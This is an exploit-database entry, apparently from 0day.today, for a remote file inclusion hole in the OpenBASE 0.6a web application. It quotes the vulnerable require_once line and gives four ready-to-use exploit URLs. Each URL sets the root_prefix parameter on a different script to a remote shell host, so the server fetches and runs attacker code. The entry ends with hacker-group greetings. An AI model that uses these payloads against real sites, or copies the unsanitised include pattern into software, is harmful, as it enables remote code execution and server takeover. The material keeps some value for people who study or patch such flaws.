OpenBASE 0.6a (root_prefix) Remote File Inclusion Vulnerabilities

2007-05-25T00:00:00
ID 1337DAY-ID-1911
Type zdt
Reporter DeltahackingTEAM
Modified 2007-05-25T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =================================================================
OpenBASE 0.6a (root_prefix) Remote File Inclusion Vulnerabilities
=================================================================



**********************************************************************************************************
                                              DeltaSecurityTEAM
**********************************************************************************************************
* Portal Name = OpenBASE Alpha 0.6
* Class = Remote File Inclusion
* Risk = High (Remote File Execution)
* Download = Http://openbase.sourceforge.net
* Discoverd By = DeltahackingTEAM
--------------------------------------------------------------------------------------------
Vulnerability C0de :
Require_once($root_prefix . "nav.php");
--------------------------------------------------------------------------------------------
- Expl0it:
Http://localhost/[PATH]/index.php?root_prefix=http://Shellz?
Http://localhost/[PATH]/email_subscribe.php?root_prefix=http://Shellz?
Http://localhost/[PATH]/download.php?root_prefix=http://Shellz?
Http://localhost/[PATH]/development.php?root_prefix=http://Shellz?
--------------------------------------------------------------------------------------------
Gr33tz : Dr.Trojan , Hiv++ , D_7j , L0rd , RezaYavari , Vpc , all IRANIAN Hackers , and all Enemy
**********************************************************************************************************



#  0day.today [2018-02-16]  #